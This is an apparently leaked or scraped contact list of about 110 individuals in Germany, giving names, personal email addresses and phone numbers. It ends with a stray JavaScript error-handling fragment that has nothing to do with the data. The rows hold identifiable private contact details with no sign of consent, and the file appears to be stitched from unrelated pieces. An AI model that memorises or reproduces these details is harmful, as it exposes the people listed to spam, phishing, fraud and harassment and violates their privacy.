Klaus,Scharf,k.scharf@ksmd.de,Germany,(49391) 633-9143
Georg,Klotzsche,klotzschi@googlemail.com,Germany,(49353485) 697-4659
Udoh,Ini,mybyte3003@yahoo.de,Germany,(490176) 000-0000
Marc Oliver,Lesch,oliverundhannah@gmx.de,Germany,(491535) 333-9833
Dennis,David,dennisdavid92@gmx.de,Germany,(491575) 586-1162
Britt,Bremer,hauswartservice-bremer@t-online.de,Germany,(49160) 530-9072
Romy,Olczyk,Olczyk.romy@web.de,Germany,(49175) 197-4039
Beate,Brunner,be-brunner@t-online.de,Germany,(4920) 562-8537
Max,Berman,mackyjones@gmail.com,Germany,(491577) 729-0261
Timo,Vock,timo.vock@gmail.com,Germany,(49178) 187-5240
Karl- Heinz ,Belter ,karl-heinz-belter@t-online.de,Germany,(49366) 340-3179
Anton,Nagy,tonio13@web.de,Germany,(49696) 530-1656
Halil,Hajredini,halilhajredini@hotmail.de,Germany,(491609) 484-4694
Patrick,Koopman,koopmanp@yahoo.com,Germany,(491511) 083-2740
Thomas,Hynek,thomashynek29@yahoo.de,Germany,(491520) 884-6071
Alexej,Maljas,alexej-maljas@live.com,Germany,(491515) 403-0806
Arne,Schrey,schrey75@gnx.net,Germany,(491515) 984-3823
Gerhard,Will,Roy-Rogers@t-online.de,Germany,(499383) 903-8762
Egbert,Post,carshipcorp@gmail.com,Germany,(491765) 336-9743
Reinhard,Pfeiffer,r.peiffer@tele2.de,Germany,(49357) 197-5000
Ulrich,Schirpenbach,uli.schirpenbach@gmx.de,Germany,(49174) 207-0676
Erika,Werner,erika.werner3110@t-online.de,Germany,(49160) 356-4306
Michael,Kainz,milchkuh67@gmail.com,Germany,(491577) 493-4720
peter,h.,peter@byom.de,Germany,(491234) 525-6695
Heiko,Kubik,heiko0311@hotmail.de,Germany,(491522) 721-3671
Nandor,Cernus,nandorcernus@t-online.de,Germany,(492104) 138-5910
Frank,Zimmermann,fzm2000@web.de,Germany,(49178) 936-6933
Janett,Roek,nette81@hotmail.de,Germany,(491522) 293-1596
Ingo,Pavka,ingo.pavka@gmx.de,Germany,(49175) 202-8592
Peter,Sommer,Exensommer@web.de,Germany,(491522) 766-1195
Uwe,Krause,u.krause05@gmail.com,Germany,(491522) 928-3388
Goscha,Muller,Schmidt.johann1986@web.de,Germany,(49174) 608-2087
Bilstein,Struppek,bilsteinstruppek@outlook.com,Germany,(491512) 576-6113
Susanne,Stuckert,susi.stuckert47@gmail.com,Germany,(491763) 017-2977
Christos,Kotrotsios,chriscross72@web.de,Germany,ERR
Robert ,Kress ,robertkress@gmx.de,Germany,(49171) 380-8757
Bilgehan ,Bekki ,bilgehan_bekki@live.de,Germany,(49176) 471-6508
Heinrich,Ditel,hdjobber@gmail.com,Germany,(497232) 308-0820
Andy,Waclawczyk,pulpduisburg@gmx.de,Germany,(49160) 857-3872
Nico,Flanz,n.mueller5@web.de,Germany,(49385) 488-5955
Hermann,Schonrock,Hermannsch@gmx.de,Germany,(492091) 497-0409
Thoralf,Backer,thoralf.baecker@web.de,Germany,(491512) 017-0064
INGRID,TEWES,at-networking@web.de,Germany,(496343) 617-9284
Petra,Stockdteher,petrastockdreher75@gmail.com,Germany,(49162) 825-4957
Thomas,Kosziolleck,Thonet36@googlemail.com,Germany,(49175) 443-7482
Tuschkowski,Yvonne,y.tuschkowski@web.de,Germany,(49177) 667-7799
Juan Carlos,Schmidt Yanes,laeolicasalvaravidas@web.de,Germany,(491577) 851-6554
Kurt,Kahlke,kahlke.spo@gmail.com,Germany,(49170) 937-2893
Gerhard,Trefzer,ib.trefzer@web.de,Germany,(49781) 919-3194
Sven Martin,Schmidt,svenms1981@gmail.com,Germany,(491590) 130-7890
David,Brooks,david.brooks.trade@gmail.com,Germany,(491525) 195-2497
Peter,Heinrich,Pero-2002tii@gmx.de,Germany,(491762) 769-2081
Kerstin,Galander,mokka-mich-eisbar@t-online.de,Germany,(491577) 572-5993
katja,schwalbe,philweisse@gmx.de,Germany,(49174) 589-2454
Wolfgang Glock,Glock,thg-glock@t-online.de,Germany,(49171) 427-3706
Arno,Preis,arnopreis54@gmail.com,Germany,(49171) 141-1271
Volker,Lobbes,lobbes@hotmail.de,Germany,(491525) 341-4643
Andreas,Wittmann,ultimate_post@yahoo.com,Germany,(49173) 716-1323
Karin ,Jung,karl-jung52@hotmail.com,Germany,(491573) 170-2027
hanspeter,kiendl,1965fm@web.de,Germany,(4994) 314-2811
Kevin,Kretschmann ,kevin-kretschmann@web.de,Germany,(491573) 437-2831
Otar,maisuradze,ota-mais@yandex.ru,Germany,(491766) 331-0359
Marko,Anicic,anicic83@gmail.com,Germany,(491522) 467-8865
Steffen,Nitzschner,nitzschner-sf@gmx.de,Germany,(49163) 735-8914
Ralf,Slembek,ralf.slembek@online.de,Germany,(49170) 828-2217
Dieter,Lasshofer,dlasshofer@arcor.de,Germany,(493615) 188-3600
Florian,Wacker,wacker83193@gmail.com,Germany,(491525) 398-6938
Alexander,Schirdewahn ,alexanderschirde@gmail.com,Germany,(491767) 267-6394
Ralph,Hensel,ralph.hensel@gmx.de,Germany,(49359) 127-0573
Thomas,Link,linktkh@o2online.de,Germany,(498519) 885-9901
Angelika Fischer,Fischer,af1962@t-online.de,Germany,(492335) 844-7222
Juergen,Zschech,jzschech@gmx.de,Germany,(49172) 707-0749
Wolfgang,Westphal,stausee@gmx.de,Germany,(491762) 159-8065
Darko,Bilav,nikolinabilav@icloud.com,Germany,(49163) 574-7412
christian,eichhorn,eichel240@gmail.com,Germany,(49171) 622-5785
manfred,back,meinback@ish.de,Germany,(491764) 336-7909
Ekkehard,Westphal,ekkehardwestphal@gmx.de,Germany,(49422) 294-7553
mayelin,Acosta,a_mayelin23@yahoo.com,Germany,(491512) 255-8380
Wil,Thoms,w.thoms@web.de,Germany,(491051) 140-2342
Uwe Sinn,Sinn,u.sinn@gmx.de,Germany,(4971) 342-2807
David,Wei,weissdvd@gmail.com,Germany,(491523) 693-3722
Christian,Hartmann,chrisnew2022@gmail.com,Germany,(49174) 763-4541
Benjamin ,Sorg,sorg.benny@gmail.com,Germany,(49175) 783-1988
Otto,Engel,ottoengel1987@gmail.com,Germany,(49160) 283-7724
Justin ,Neuhaus ,Jneuhaus92@gmail.com,Germany,(49177) 186-8247
alexander,tews,vip.tews@list.ru,Germany,(491762) 151-3131
Ludwig,Scholl,schoell-osi@t-online.de,Germany,(49917) 996-3802
Evita,Leonhardt,evita.leonhardt@icloud.com,Germany,(49) 847-3950
werner,friedrich,friedschnurzel@freenet.de,Germany,(49332) 075-0878
Andreas,Rippin,andreasrippin@hotmail.com,Germany,(491575) 409-8266
thomas,Hanf,hanfthomas42@gmail.com,Germany,(491525) 698-6179
Herro,Herin,Herro@mail.de,Germany,(4930) 241-5889
michael,Belz,belzmichi@gmail.com,Germany,(49170) 303-1627
Peggy,Mundt,peggymundt74.p.m@gmail.com,Germany,(49162) 872-7235
Jens ,Schwieger ,jens-schwieger@web.de,Germany,(49174) 174-9935
Lets ,Sell ,letssell123@gmx.de,Germany,(491522) 939-8382
Stefan,Fust,info@elektro-fust.fe,Germany,(49171) 720-8113
Werner,Herold,werner.herold@vkkl.de,Germany,(49171) 622-5785
Kevin,Engler,kevin-engler@gmx.de,Germany,(49162) 746-3275
Otto,Heise,otto_heise@web.de,Germany,(491523) 369-0995
qadeer,javed,nehanqadeer2@gmail.com,Germany,(491521) 712-8881
Zueleha,Lekesiz,lekesiz672@gmail.com,Germany,(49173) 734-6040
Johann,Gruber,johanngruber@mail.de,Germany,(491522) 276-2116
Ahmed,Krouma,afr2003k@freenet.de,Germany,(49219) 146-2516
Julitta,karnagel,julittakarnagel@aol.com,Germany,(4915200) 684-2554
Kevin,Kubler,masterKevin1991@web.de,Germany,(491522) 357-6491
} catch (e) {
app.alert(e.message);
}